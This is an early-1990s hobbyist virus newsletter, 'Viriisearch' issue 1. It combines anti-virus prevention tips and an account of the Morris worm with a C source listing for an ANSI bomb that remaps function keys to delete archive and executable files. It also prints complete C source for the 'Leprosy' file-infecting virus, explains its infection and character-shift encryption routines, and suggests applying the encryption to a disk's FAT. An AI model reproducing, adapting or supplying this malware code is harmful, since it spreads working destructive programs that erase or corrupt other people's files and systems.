textfiles/virus/vir-1.v1

887 lines
36 KiB
Plaintext
Raw Permalink Blame History

DISCLAIMER:
The author will NOT accept responsibility for any damage to your
computer media and/or files, or responsibility for any action you might
take that will result in legal proceedings, the source code, if any, in
this newsletter is THE REAL THING, and you, after you read this, will be
well aware of what virii are capable of, and knowing that, it is expected
that you will act responsibly.
DISCLAIMER II:
All I know about programming I have learned on my own, and did not go to
school for, and am still learning. As a result, I am sometimes prone to
make mistakes, and be wrong about things, so please be patient if I should
make a mistake, or say something that isn't true, which would be totally
unintentional.
ViriiSearch
-----------
The Virus Research Newsletter
Volume 1, Number 1
CREDITS:
-----------------------------------------------------------------------------
Author...................................................Criminal Minded <tm>
Editor...................................................Criminal Minded <tm>
Ideas, Source, Examples Supplied By......................Criminal Minded <tm>
Facts Stolen From Several Sources By.....................Criminal Minded <tm>
-----------------------------------------------------------------------------
Introduction:
Welcome To The First Issue Of Viriisearch, The Virus Research Newsletter.
I have always had a fascination of computer virii, since I first heard the
word. I, like a lot of people, had no idea what they were about, and was
extremely curious. And this newsletter will cover my process as I find out
more about them. How they are written, why they act like they do, and if
possible, why people would write them.
In this issue:
Prevention And Protection Methods
The "Internet Worm"
Trojans, Worms, Virii, Ansi Bombs: What's the difference?
Benign VS Malignant Virii
Sample Source Code Of Virii
Discussion Of The Infection And Encryption Methods Used By "Leprosy"
The "Uncompress" Virus
"Suicidal Tendencies" Department/Virus Of The Month
Discussion Of Anti Viral Software
Things You Should Know
-----------------------------------------------------------------------------
Prevention And Protection Methods:
-----------------------------------------------------------------------------
After the infamous "Michealangelo" panic, I realized what the masses are
lacking is virus literacy. If people had a understanding of them, and knew
the appropriate methods of prevention, and dealing with a infection, the
situation would've never been blown out of proportion like it was. When I
hear people ask questions such as "If I Put My Toothbrush Near A Infected
Disk, Will I Catch The Virus When I Brush My Teeth?" I have to laugh...Ok,
maybe that example is a little exaggerated, but some of the questions are
hitting close to that level of stupidity, so here are some protection and
prevention methods:
1. If you download a file from a public BBS, or a friend gives you a file
that he downloaded from somewhere, be sure and uncompress the file onto
a floppy and run your virus scanner on it. NEVER run a new file without
checking it first. Some people believe a virus scanner can spot a file
that is infected within a compressed file by running the virus scanner
on it, this is NOT true. You have to decompress the file first.
By doing this, you are dropping your chances of infection considerably
BUT there is always the chance of a unknown virus that the scanner won't
spot so that is why you have to ALWAYS have a backup of all your data on
tape or disk. That way if the unknown virus wipes your hard drive, you
have the backup and nothing is lost.
2. In the event of a virus infection, shut your computer off immediately and
wait 10-20 seconds. NEVER do a "warm boot" (CTRL-ALT-DEL) because some
virii can survive through a warm boot. Always do a "cold boot" (Shut the
computer OFF). After the 10-20 seconds, boot your computer from a CLEAN
WRITE PROTECTED DOS Bootable disk, and then run your virus scanner from
a WRITE PROTECTED disk. (The reason for having the disks write protected
is just in case the virus is still lurking around, it won't be able to
write itself and infect the floppies). If the virus is a known one, have
the virus scanner either fix the infected files, or delete them (and
replace from your backup) or make a note of the infected files and erase
them manually.
3. How do you spot a attack by a unknown virus?
A) Change in sizes of files
B) Change of file dates/times
C) Deleted files
D) Slower processing time
E) Unusual messages
F) Disk activity, more than usual (Writing to the disk when it's not
neccesary)
4. What to do in the event of a unknown virus attack?
A) Follow steps of shutting machine off and re-booting as outlined in
#2
B) Run your virus scanner and have it look for files that changed in
size or date (if your scanner has a feature that makes note of
original virus sizes/dates/times)
C) If your virus scanner doesn't make note of original sizes/dates/times
you can always make note of them manually and then check them yourself.
It's time consuming, but can prevent serious damage to your data, and
you should try to isolate a infected file and send it to ME (info on
how to get it to me at the end of the newsletter) so I can attempt to
dissect it and notify the appropriate person of the new virus.
D) Some virus scanners come with a TSR that will prevent any writing to
disk, it will pop a window or message on the screen saying: Attempting
to write to <filename> Do you wish to do so? If something is trying to
write to a file that shouldn't be written to at that time, chances are
you are dealing with a unknown virus and should say no. Then try to
find and isolate the virus.
E) How do you spot a unknown virus or a known virus without running
a virus scanner?
1) Most virii are tiny (2 kilobytes to 10 kilobytes) and the majority
of them are .COM files so if you have, let's say, a 6K .COM file
that claims to be a "awesome game" I'd be a little bit suspicious.
2) Weird names. I would not run "DIE.COM" or "KILLER.COM" and over
the years I have run into files named that, when people tried to
infect my computer. At least they could've named it something else
not so obvious.
3) As stated in #1, the MAJORITY of them are small .COM files but they
can be .EXE files as well, and bigger then 10K.
All it takes is a little bit of common sense, and 99% of what could've been
virus attacks on your computer can be prevented. All you have to remember is
that they cannot infect your machine unless run first...BUT there is one
virus out there that, when uncompressed, activates itself. This virus does
NOT have to be executed in order to infect your machine, and it will be
discussed later on. In the event of where this "uncompress" virus wipes some
of your data, or any other virus, that's what backups are for. ALWAYS HAVE A
BACKUP OF YOUR HARD DRIVE and NEVER put a floppy in the drive and run a
program when there is a virus in memory because, chances are, that floppy
will get ruined/infected as well, unless it is write protected. The instant
you are aware of a infection, shut the machine off! Because there are some
virii that, upon finding a write protected floppy that it cannot infect, or
something else it can't do, "get mad" and cause destruction.
-----------------------------------------------------------------------------
The "Internet Worm"
-----------------------------------------------------------------------------
This has to be the most widely publicized case of a virus attack ever.
On 10/02/88, Robert Morris, a graduate student, wrote and released a worm
that infected "Internet" the worldwide network. Within hours, it infected
thousands of computers. The worm was benign, not causing any damage to files
or media, but replicated itself over and over rapidly, and resulted in the
computers on Internet having to be shut down and all copies of the worm
removed. Some of the hosts were still disconnected from the network eight
days later, showing the impact this worm had. Morris claimed he did it as a
experiment, and made a mistake in how fast it actually would replicate. The
media, namely NY Times, USA Today, and The Wall Street Journal, gave the worm
front page coverage. On November 4th, teams at several insitutions went to
work and successfully "decompiled" the worm and studied it in the language it
was written in, "C language", but the source code was never released for fear
of hackers using the source for malicious purposes. In the end, Morris was
removed from school, ordered to pay $10,000 in fines, perform 400 hours of
community services and was on 3 years probation. Some people argued as to
whether or not Morris was guilty because he evidently didn't do it to cause
damage, but rather as a experiment that went wrong.
What the worm did: It hacked it's way into hosts attached to the internet by
cracking passwords and then replicated itself rapidly, taking up all the
memory and forcing the hosts to be shut down.
-----------------------------------------------------------------------------
Trojans, Worms, Virii, Ansi Bombs: What's the difference?
-----------------------------------------------------------------------------
Trojans: Programs disguised as a useful program or a existing real program
that can cause damage on your system.
Worms: Benign virii, rarely causing damage to media or files, such as the
Internet worm.
Ansi Bombs: Tiny programs that use ANSI to remap your keyboard causing keys,
when pressed, to do other things.
Example: If a ansi bomb was in memory, and it remapped the "K" key to erase
all the files in the current directory, as soon as you pressed K
the files would be gone. Usually when you type C>ERASE *.*
MS-DOS will respond with: All the files in the current directory
will be deleted! Are you sure (y/n)?
Some ansi bombs are intelligent and can prevent such DOS messages
from appearing.
-----------------------------------------------------------------------------
Here is the source code to a simple ansi bomb:
-----------------------------------------------------------------------------
#include <stdio.h>
#define KILL(K, S) printf("\033[0;%d;\"%s\";13p", K, S)
#define F1 59
#define F2 60
#define F3 61
#define F4 62
main()
{
KILL(F1, "DEL *.ZIP");
KILL(F2, "DEL *.ARJ");
KILL(F3, "DEL *.COM");
KILL(F4, "DEL *.EXE");
}
-----------------------------------------------------------------------------
This just assigns the string (DEL *.ZIP etc) to the respective keys. If this
ansi bomb was in memory, and you pressed F1, it would delete all the files
in the current directory with the extension of .ZIP. The command (DEL *.ZIP)
would appear on the screen though, and you could use a file recovery program
to recover the deleted files. There are more lethal ansi bombs, ones that can
format your hard drive and other such destructive acts.
Prevention: Use NANSI or ZANSI rather than ANSI and the ansi bombs won't work.
-----------------------------------------------------------------------------
Virii: Destructive programs that use 'stealth' techniques, and can replicate.
Not All virii are destructive, some can be benign, and just pop up
annoying messages time to time or slow down system speed.
-----------------------------------------------------------------------------
No more will be discussed of ANSI Bombs or Trojans as this newsletter is
dedicated entirely to virii.
-----------------------------------------------------------------------------
Benign VS Malignant Virii:
-----------------------------------------------------------------------------
Benign Virii do not cause damage but do things such as take up all the memory,
slow processing speed down, and send annoying messages to the console, or the
printer, etc...
Maligant, or Malicious, Virii cause actual destruction, deleting files,
destroying the FAT or boot sector, locking up the computer, formatting disks
or hard drives, etc...
-----------------------------------------------------------------------------
Virus Source Code:
-----------------------------------------------------------------------------
Now for the real thing, we will start with the C Language source code to the
"Leprosy" Virus.
-----------------------------------------------------------------------------
#pragma inline
#define CRLF "\x17\x14" /* CR/LF combo encrypted. */
#define NO_MATCH 0x12 /* No match in wildcard search. */
char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.";
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};
struct _dta /* Disk Transfer Area format for find. */
{
char findnext[21];
char attribute;
int timestamp;
int datestamp;
long filesize;
char filename[13];
} *dta = (struct _dta *) 0x80; /* Set it to default DTA. */
const char filler[] = "XX"; /* Pad file length to 666 bytes. */
const char *codestart = (char *) 0x100; /* Memory where virus code begins. */
const int virus_size = 666; /* The size in bytes of the virus code. */
const int infection_rate = 4; /* How many files to infect per run. */
char compare_buf[20]; /* Load program here to test infection. */
int handle; /* The current file handle being used. */
int datestamp, timestamp; /* Store original date and time here. */
char diseased_count = 0; /* How many infected files found so far. */
char success = 0; /* How many infected this run. */
/* The following are function prototypes, in keeping with ANSI */
/* Standard C, for the support functions of this program. */
int find_first( char *fn );
int find_healthy( void );
int find_next( void );
int healthy( void );
void infect( void );
void close_handle( void );
void open_handle( char *fn );
void print_s( char *s );
void restore_timestamp( void );
/*----------------------------------*/
/* M A I N P R O G R A M */
/*----------------------------------*/
int main( void ) {
int x = 0;
do {
if ( find_healthy() ) { /* Is there an un-infected file? */
infect(); /* Well, then infect it! */
x++; /* Add one to the counter. */
success++; /* Carve a notch in our belt. */
}
else { /* If there ain't a file here... */
_DX = (int) ".."; /* See if we can step back to */
_AH = 0x3b; /* the parent directory, and try */
asm int 21H; /* there. */
x++; /* Increment the counter anyway, to */
} /* avoid infinite loops. */
} while( x < infection_rate ); /* Do this until we've had enough. */
if ( success ) /* If we got something this time, */
print_s( fake_msg ); /* feed 'em the phony error line. */
else
if ( diseased_count > 6 ) /* If we found 6+ infected files */
for( x = 0; x < 3; x++ ) /* along the way, laugh!! */
print_s( virus_msg[x] );
else
print_s( fake_msg ); /* Otherwise, keep a low profile. */
return;
}
void infect( void ) {
_DX = (int) dta->filename; /* DX register points to filename. */
_CX = 0x00; /* No attribute flags are set. */
_AL = 0x01; /* Use Set Attribute sub-function. */
_AH = 0x43; /* Assure access to write file. */
asm int 21H; /* Call DOS interrupt. */
open_handle( dta->filename ); /* Re-open the healthy file. */
_BX = handle; /* BX register holds handle. */
_CX = virus_size; /* Number of bytes to write. */
_DX = (int) codestart; /* Write program code. */
_AH = 0x40; /* Set up and call DOS. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close file. */
return;
}
int find_healthy( void ) {
if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
return 0; /* Otherwise, say so. */
}
int healthy( void ) {
int i;
datestamp = dta->datestamp; /* Save time & date for later. */
timestamp = dta->timestamp;
open_handle( dta->filename ); /* Open last file located. */
_BX = handle; /* BX holds current file handle. */
_CX = 20; /* We only want a few bytes. */
_DX = (int) compare_buf; /* DX points to the scratch buffer. */
_AH = 0x3f; /* Read in file for comparison. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close the file. */
for ( i = 0; i < 20; i++ ) /* Compare to virus code. */
if ( compare_buf[i] != *(codestart+i) )
return 1; /* If no match, return healthy. */
diseased_count++; /* Chalk up one more fucked file. */
return 0; /* Otherwise, return infected. */
}
void restore_timestamp( void ) {
_AL = 0x01; /* Keep original date & time. */
_BX = handle; /* Same file handle. */
_CX = timestamp; /* Get time & date from DTA. */
_DX = datestamp;
_AH = 0x57; /* Do DOS service. */
asm int 21H;
return;
}
void print_s( char *s ) {
char *p = s;
while ( *p ) { /* Subtract 10 from every character. */
*p -= 10;
p++;
}
_DX = (int) s; /* Set DX to point to adjusted string. */
_AH = 0x09; /* Set DOS function number. */
asm int 21H; /* Call DOS interrupt. */
return;
}
int find_first( char *fn ) {
_DX = (int) fn; /* Point DX to the file name. */
_CX = 0xff; /* Search for all attributes. */
_AH = 0x4e; /* 'Find first' DOS service. */
asm int 21H; /* Go, DOS, go. */
return _AX; /* Return possible error code. */
}
int find_next( void ) {
_AH = 0x4f; /* 'Find next' function. */
asm int 21H; /* Call DOS. */
return _AX; /* Return any error code. */
}
void open_handle( char *fn ) {
_DX = (int) fn; /* Point DX to the filename. */
_AL = 0x02; /* Always open for both read & write. */
_AH = 0x3d; /* "Open handle" service. */
asm int 21H; /* Call DOS. */
handle = _AX; /* Assume handle returned OK. */
return;
}
void close_handle( void ) {
_BX = handle; /* Load BX register w/current file handle. */
_AH = 0x3e; /* Set up and call DOS service. */
asm int 21H;
return;
}
-----------------------------------------------------------------------------
With source code discussed in this newsletter, main areas covered will be on
encryption techniques, how the virus infects files, how they 'replicate'
and 'breed' and how 'stealth techniques' are implemented in the code.
In this case we will cover how the virus infects the files and encrypts.
-----------------------------------------------------------------------------
Infection Method:
-----------------------------------------------------------------------------
void infect( void ) {
_DX = (int) dta->filename; /* DX register points to filename. */
_CX = 0x00; /* No attribute flags are set. */
_AL = 0x01; /* Use Set Attribute sub-function. */
_AH = 0x43; /* Assure access to write file. */
asm int 21H; /* Call DOS interrupt. */
open_handle( dta->filename ); /* Re-open the healthy file. */
_BX = handle; /* BX register holds handle. */
_CX = virus_size; /* Number of bytes to write. */
_DX = (int) codestart; /* Write program code. */
_AH = 0x40; /* Set up and call DOS. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close file. */
return;
}
-----------------------------------------------------------------------------
void infect( void ) is just what he named this function.
The function will return nothing, and be called with no parameters as the two
"voids" suggest.
Register DX points to the filename as declared in the structure "_dta"
-----------------------------------------------------------------------------
_dta structure:
-----------------------------------------------------------------------------
struct _dta
{
char findnext[21];
char attribute;
int timestamp;
int datestamp;
long filesize;
char filename[13];
} *dta = (struct _dta *) 0x80;
-----------------------------------------------------------------------------
Next in the "infect" function, 0x00 is assigned to the CX register.
With function 43H in assembly, register CX is assigned with the bit of the
attribute that you want to set the file to.
Bit: Attribute:
0 Read Only
1 Hidden
2 System
3-4 Reserved
5 Archive
6-15 Reserved
Because the author assigned 0x00 to CX, none of the above attributes were set
on the file, allowing it to be written to.
Next in the "infect" function is 0x01 being assigned to register AL
0x01 is telling the program we want to SET attributes.
Then following that is: 0x43 being assigned to AH
Which is telling the program we want to use function 43H (Get/Set Attributes)
The current handle is assigned to register BX
The size of the virus code, or the number of bytes to write, stored in the
integer "virus_size" is assigned to register CX
virus_size is declared and initialized at the beginning of the source code
as a integer with the value "666"
Then the virus code is written to the file, the file is closed and the
original date and time the file had are restored.
-----------------------------------------------------------------------------
The Method Of Encryption:
-----------------------------------------------------------------------------
void print_s( char *s ) {
char *p = s;
while ( *p ) { /* Subtract 10 from every character. */
*p -= 10;
p++;
}
_DX = (int) s; /* Set DX to point to adjusted string. */
_AH = 0x09; /* Set DOS function number. */
asm int 21H; /* Call DOS interrupt. */
return;
}
-----------------------------------------------------------------------------
The above function used in "Leprosy", called "print_s" accepts one parameter,
a string of text, like these ones defined at the beginning of the Leprosy
source code:
-----------------------------------------------------------------------------
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};
-----------------------------------------------------------------------------
Note: CRLF is defined as "\x17\x14" at the beginning of the source, \x17
being the hexadecimal code for a carriage return and \x14 the code for a line
feed.
-----------------------------------------------------------------------------
When a string is passed to the "print_s" function, it is un-encrypted.
print_s(virus_msg[0]);
print_s(virus_msg[1]);
print_s(virus_msg[2]);
would result in the following being printed to the screen:
------------------------------------------------------------
NEWS FLASH!! Your system has been infected with the
incurable decay of LEPROSY 1.00, a virus invented by
PCM2 in June of 1990. Good luck!
-----------------------------------------------------------
The compiler I currently use does not accept inline assembly
code as the author of leprosy had in his source so I modified
the "print_s" function so I could compile it:
For those interested, I use Microsoft Quick C (C) Microsoft
-----------------------------------------------------------
/* NOTE: I removed the . from the end of each message because that is */
/* A $ when un-encrypted, and the $ to terminate the string is only */
/* required for the assembly version of the "print_s" function */
/* Also: The hexadecimal constants in the strings are as follows: */
/* \x13 = TAB, \x7f = u, \x83 = y, \x81 = w, \x80 = v */
#include <stdio.h>
#define CRLF "\x17\x14"
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14"
};
void print_s (char *s);
int main (void);
main()
{
print_s(virus_msg[0]);
print_s(virus_msg[1]);
print_s(virus_msg[2]);
}
void print_s (char *s) {
char *p = s;
while ( *p ) {
*p -= 10;
p++;
}
printf("%s\n",s);
}
-----------------------------------------------------------------------------
*p -= 10; is what does it all. It adds the value of 10 to each character and
can be used either way, to unencrypt or to encrypt.
if you change it to: *p += 10;
it will then encrypt.
You can also change it to:
*p -= rand() % 35000; /* #include <stdio.h> for "rand()" */
and it will change the value it uses to encrypt or un-encrypt everytime it
passes through the "while" loop or you can change it to any value you like.
-----------------------------------------------------------------------------
This method of encryption can be used to encrypt files, file allocation
tables, boot sectors, etc. All you need is a function that reads and writes
either of the three. For instance, read the contents of the File Allocation
Table, and pass the string(s) through the print_s function and then write
the encrypted string(s) back to the File Allocation Table. I don't suggest
doing this to your hard drive, or anyone elses, for it will result in either
you or the other person having to crack the encryption and restore the FAT
manually, or formatting the hard drive and replacing all the files. If you
want to experiment, do it on a floppy, like I did.
-----------------------------------------------------------------------------
The "uncompress" virus
-----------------------------------------------------------------------------
According to the person who uploaded it to the BBS where I got it from, this
virus infects when you uncompress the file.
I did not find any indication of this when I uncompressed the file, called
NJERU.ARJ. It is a Arkanoid II: Revenge Of Doh crack released by FiRM that
is infected with a strain of Jerusalem-4.
I ran it and Norton Anti Virus (C) Symantec reported the virus in memory.
I then proceeded to run EDLIN.EXE (C) Microsoft, SYS.COM (C) Microsoft,
COMMAND.COM (C) Microsoft, and ARJ.EXE (C) Robert K. Jung to see what would
happen. These are the results:
Filename: Original Size: Size After Infection:
EDLIN.EXE 14,121 bytes 15,936 bytes
ARJ.EXE 98,968 bytes 100,784 bytes
SYS.COM 13,440 bytes 15,253 bytes
There were no size changes to COMMAND.COM, nor was it infected.
A file was also created by the virus called "NJVR._OO" that was around 26K
but only had one line in it, a error message concerning the media of the disk.
Sorry, the exact size of the file NVJR._OO and the exact message are not
available. When I attempted to remove the apparent text file using the
MS-DOS "DEL" command, it displayed the error message and tried to write to
drive A which was write protected at the time. Then it went back to drive B
and apparently did damage to the media. I formatted the disk and it was fine
afterwards. I have never seen anything like this before, a text file being
able to do damage just by attempting to delete it. I guess it wasn't a text
file after all but I still have no idea how it managed to corrupt the media
on drive B. It also created a file called "N" which was 0 bytes and couldn't
be deleted or read by Norton Anti Virus.
-----------------------------------------------------------------------------
"Suicidal Tendencies" Department.
(Appropriately named department: I can't believe I am deliberately running
a virus on my system)
This section of the newsletter will cover what happened when I run a virus
on a floppy with MSDOS.SYS, IO.SYS, COMMAND.COM, a overlay file, a .EXE file
and a few other assorted files on it.
The virus of the month award goes to: The Perfume Virus
-----------------------------------------------------------------------------
What Happened:
-----------------------------------------------------------------------------
Filename: PERFUME.COM Filesize: 806 bytes
Ok, I placed this file on drive B with the following files:
Filename: Original Size:
----------------------------------
COMMAND.COM 47845
MSDOS.SYS 37394
IO.SYS 33430
ANSI.SYS 9029
RAMDRIVE.SYS 5873
CONFIG.SYS 39
UNDELETE.EXE 13924
AUTOEXEC.BAT 69
15ALL05.DEF 67278
MICHEL.DEF 456
NSETUP.OVL 876
PKUNZIP.EXE 23528
----------------------------------
When I ran PERFUME.COM, it displayed the message: This is a tiny COM program.
and it infected COMMAND.COM, enlarging it by 765 bytes to 48,610 bytes.
It then proceeded to remove the hidden/system attribute from MSDOS.SYS but
didn't infect it and then attempted to infect the disk in drive A, which was
write protected at the time. The virus, realizing it couldn't write to drive
A, displayed the message:
Not ready reading drive A
Insert disk with \COMMAND.COM in drive A
Press any key to continue . . .
Now, usually when DOS displays that message, it only needs to READ, and still
could've if the disk was write protected, so evidently the virus was
trying to outsmart me and fool me into thinking that was a DOS message so it
could infect at least one more disk.
I ran Norton Anti Virus v2.0 (C) Symantec, and it reported Perfume in memory
so I re-booted and ran NAV again, this time it didn't report the virus being
in memory, but did identify COMMAND.COM and PERFUME.COM as being infected.
Also:
In my search for the virus of the month, I came across a file called
"ISRAELI.ZIP" which I thought to be a virus called "Israeli" but as it turns
out it was a strain of Jerusalem-4, the same as the supposed "Uncompress
virus" discussed earlier. The file was called: SORTINFT.EXE and was 3760
bytes. When I ran it, it did no damage to the disk or files but NAV did
report Jerusalem-4 in memory so I re-booted. I then ran NAV again and when
the screen came up saying who the copy of NAV was registered to, it said:
Registered To:
Criminal Mi<4D><69>ed <tm>
Viriisearch Ne<4E><65>letter, Inc.
Weird eh? And that's not all, I went to scan memory, and the little window
came up that it displays the name of the current virus being scanned for, but
that's it, no names were displayed. The program appeared to freeze up, and
the disk kept spinning with the drive light on. I re-booted once again and
ran NAV again. The weird letters were still there but it scanned memory no
problem this time. I exited it from NAV and went to drive B to delete files
when I noticed a file called: NRVN E._OO that was 4096 bytes long. Since when
does DOS allow spaces in filenames? As a result I couldn't view it or delete
it by typing: C>DEL NRVN E._OO so I typed: C>DEL *._OO and that worked. At
one point a message also came up on the screen: "File Allocation Table Bad,
Drive B". I imagine Jerusalem-4 was responsible for the weird file name and
the bad FAT on drive B. I have no idea why NAV was acting funny, possibly
a genuine disk error and not due to a virus, since the disk was always write
protected.
-----------------------------------------------------------------------------
Well, that's it for "Suicidal Tendencies" for this month!
I don't recommend trying this on any computer with a hard drive. I do not have
a hard drive on the machine I do my experimenting on, so if I am careful and
keep the virus isolated to one disk, I have nothing to worry about.
-----------------------------------------------------------------------------
Anti Viral Software:
-----------------------------------------------------------------------------
Here are some nice virus scanners/anti viral programs to check out:
-----------------------------------------------------------------------------
Scan v89b (C) McAfee - available on most Public Domain BBSes
Clean v89b (C) McAfee - available on most Public Domain BBSes
Norton Anti Virus v2.0 (C) Symantec
Central Point Anti Virus (C) Central Point Software
There are a few others, but I think the above four are the best. I use
Norton Anti Virus and Scan.
-----------------------------------------------------------------------------
Some things you should know:
-----------------------------------------------------------------------------
Most people assume that a hard drive in a newly purchased computer, or a new
program still in the shrinkwrap are always virus free. Well, this is just not
true. The reported cases are few and far in between, but today anything can
happen, and it has. A certain computer company shipped out 500 of their
computers infected with the Michaelangelo virus, which started the whole
panic in the first place. And there have been a few times where someone bought
a brand new program, took it home and started using it, not expecting it to
be infected with a virus. Well, it was. After all, people create virii and
people work at computer companies, and software distributors. So what's
stopping a pissed off employee from infecting a computer or a program? Nothing
at all.
How you take this information is entirely up to you.
If you call a BBS and they say they scan for virii, don't assume that every
single file will be virus free, some can sneak through. There is also the
possibility of a unknown virus that was not detected by the scanner.
Last but not least: ALWAYS BACK UP YOUR DATA!!!
Philosophy Dept:
"Knowledge is power" - Francis Bacon, 16th Century Philosopher
"Even if a computer is locked, sealed in concrete, placed in a lead room and
surrounded by armed guards, I'd still have my doubts."
Those aren't the exact words and I forget who said that, but it is quite
appropriate and all too true.
I hope you enjoyed this issue of "Viriisearch" The newsletter dedicated
entirely to computer virii.
Until Next Time......Be Careful!!!
* Criminal Minded <tm> *